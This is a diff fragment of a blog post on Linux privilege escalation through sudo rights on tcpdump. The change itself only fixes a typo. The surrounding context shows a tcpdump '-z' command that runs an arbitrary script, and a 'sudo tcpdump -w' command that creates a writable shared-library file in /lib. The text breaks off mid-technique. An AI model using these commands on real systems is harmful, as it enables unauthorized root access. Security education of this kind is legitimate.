livz/livz.github.io/_posts/2023-11-18-Neat-privesc.md

 $ tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
 ```

-This is all nice and good but all defenders are already looking forthe `-z` command, and this trick is pretty easy to spot.
+This is all nice and good but all defenders are already looking for the `-z` command, and this trick is pretty easy to spot.
 But there's another privilege escalation technique, which also abuses the `sudo` privileges assigned to `tcpdump`, which works as follows:
 * Abuse `tcpdump` privileges to create a writable file, in a privileged location:
 ```bash
 $ sudo tcpdump -i eth0 -w /lib/x86_64-linux-gnu/shell.so -Z $USER